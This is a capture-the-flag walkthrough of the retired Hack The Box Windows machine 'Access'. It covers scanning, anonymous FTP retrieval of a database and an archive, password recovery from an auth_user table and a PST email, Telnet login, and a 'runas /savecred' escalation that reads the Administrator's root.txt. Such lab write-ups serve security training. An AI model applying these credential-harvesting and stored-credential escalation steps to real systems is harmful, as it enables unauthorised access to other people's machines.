
Name: Access
Release Date: 29 Sep 2018
Retire Date: 23 Feb 2019
OS: Windows
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
m0noc 00 days, 00 hours, 11 mins, 58 seconds
no0ne 00 days, 01 hours, 55 mins, 30 seconds
Creator: egre55
CherryTree File: CherryTree - Remove the .txt extension

We start box with the usual nmap -sC -sV -oA ./Access and we get the following results.

# Nmap 7.70 scan initiated Sun Oct 21 10:32:38 2018 as: nmap -sC -sV -oA ./Access
   Nmap scan report for
   Host is up (0.059s latency).
   Not shown: 997 filtered ports
   21/tcp open  ftp     Microsoft ftpd
   | ftp-anon: Anonymous FTP login allowed (FTP code 230)
   |_Can't get directory listing: PASV failed: 425 Cannot open data connection.
   | ftp-syst: 
   |_  SYST: Windows_NT
   23/tcp open  telnet?
   80/tcp open  http    Microsoft IIS httpd 7.5
   | http-methods: 
   |_  Potentially risky methods: TRACE
   |_http-server-header: Microsoft-IIS/7.5
   |_http-title: MegaCorp
   Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

   Service detection performed. Please report any incorrect results at .
   # Nmap done at Sun Oct 21 10:36:00 2018 -- 1 IP address (1 host up) scanned in 202.08 seconds

FTP Anonymous, Telnet, and a Web portal.  Let's take it from the top.  FTP to the box with anonymous and no password.  We see two folders (Backup and Engineer). In Backups, we have backup.mdb and in Engineer, we have 'Access'.  Get them both.

We can use an online converter like to convert the old MDB Jet database over to a CSV and in the auth_user table we get a set of passwords.

If we use access4u@security as the password for the Access file, we get a new PST file.  Here, I switched over to my Windows host, but it can easily be done in Evolution on a Linux machine.  There is exactly ONE message in the PST.

So we know the "security" account password is '4Cc3ssC0ntr0ller'.  Let's try to Telnet with it. Success! Now navigate to the Desktop can 'type user.txt' to get the user flag.

Now, we need to look around for a privesc path.  Running 'cmdkey /list' will show you if any credentials are stored on Windows boxes. Lo and Behold! Stored Administrator credentials.  That means we can do 'runas' as a privesc path.

 Hmmm.  Running 'runas /savecred /user:ACCESS\Administrator "cmd /c type C:\Users\Administrator\Desktop\root.txt"' did absolutely nothing.  Let's try and pipe that to a more accessible file with:

runas /savecred /user:ACCESS\Administrator "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Documents\null.txt"

That's all, folks!